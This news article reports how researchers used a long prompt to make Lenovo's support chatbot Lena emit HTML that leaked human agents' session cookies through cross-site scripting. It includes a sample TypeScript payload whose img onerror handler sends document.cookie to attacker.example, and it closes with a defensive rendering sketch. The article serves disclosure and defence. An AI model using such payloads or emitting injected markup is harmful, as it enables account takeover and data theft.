- Security researchers found a way to fool Lenovo's AI chatbot, Lena
- Lena shared active session cookies with the researchers
- Malicious requests could be used for a wide range of attacks
Lena, the AI-powered chatbot featured on Lenovo's website, could be turned into a malicious insider, leaking company secrets or running malware, using nothing but a convincing prompt, experts have warned.
Security researchers at Cybernews managed to obtain active session cookies from human customer support agents, essentially allowing them to take over the agents' accounts, access sensitive data, and potentially pivot elsewhere in the corporate network.
“The discovery highlights multiple security issues: improper user input sanitization, improper chatbot output sanitization, the web server not verifying content produced by the chatbot, running unverified code, and loading content from arbitrary web resources. This leaves plenty of room for cross-site scripting (XSS) attacks,” the researchers said in their report.
“Massive security oversight”
At the heart of the problem, they said, is the fact that chatbots are “people pleasers”. Without proper guardrails baked in, they will do as they are told, unable to distinguish a benign request from a malicious one.
In this case, Cybernews researchers wrote a 400-word prompt in which the chatbot was asked to generate an HTML response.
The response contained hidden instructions to load resources from a server under the attackers’ control and to send data obtained from the client’s browser to it.
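The report does not reproduce the exact payload, but the class of attack it describes is well understood: if the support interface renders the chatbot’s HTML output without sanitization, any markup the model is tricked into emitting runs in the agent’s browser. The sketch below is a generic, hypothetical illustration of that pattern; the endpoint attacker.example and the rendering function are assumptions, not details from the report.

```typescript
// Hypothetical sketch of chatbot-output XSS; not the payload from the report.
// If the support UI assigns model output to innerHTML, an injected <img> with
// an onerror handler executes in the agent's session and can exfiltrate
// cookies that are readable from JavaScript (i.e. not flagged HttpOnly).

const injectedHtml = `
  <img src="https://nonexistent.invalid/x.png"
       onerror="new Image().src =
         'https://attacker.example/collect?c=' + encodeURIComponent(document.cookie)">
`;

// Vulnerable rendering path: chatbot output treated as trusted markup.
function renderChatbotReply(container: HTMLElement, reply: string): void {
  container.innerHTML = reply; // the onerror handler above fires here
}
```

This is the same class of issue the researchers describe as the web server not verifying content produced by the chatbot before it reaches the browser.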
They also emphasized that although their tests resulted in session cookie theft, the end result could be pretty much anything.
“This is not limited to stealing cookies. It may also be possible to execute some system commands, which could allow the installation of backdoors and lateral movement to other servers and computers on the network,” Cybernews explained.
“We didn’t try any of this,” they added.
After notifying Lenovo of its findings, Cybernews was told that the tech giant had “protected its systems”, without specifying exactly what was done to address what the researchers described as a “massive security oversight” with potentially devastating consequences.
The researchers encouraged all companies using chatbots to assume that all outputs are “potentially malicious” and to act accordingly.
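That advice translates into a simple rule for anyone embedding a chatbot in a web page: never hand model output to the browser as live HTML. Below is a minimal sketch of that rule, assuming a browser-based chat widget; the function and variable names are illustrative and not taken from Lenovo's implementation.

```typescript
// Minimal sketch of treating chatbot output as untrusted (illustrative names only).

function renderChatbotReplySafely(container: HTMLElement, reply: string): void {
  // textContent displays the model's answer as plain text, so any injected
  // <img onerror=...> or <script> markup is shown rather than executed.
  container.textContent = reply;
}

// If rich formatting is genuinely needed, pass the output through an HTML
// sanitizer library and serve a strict Content-Security-Policy instead of
// assigning model output to innerHTML directly.
```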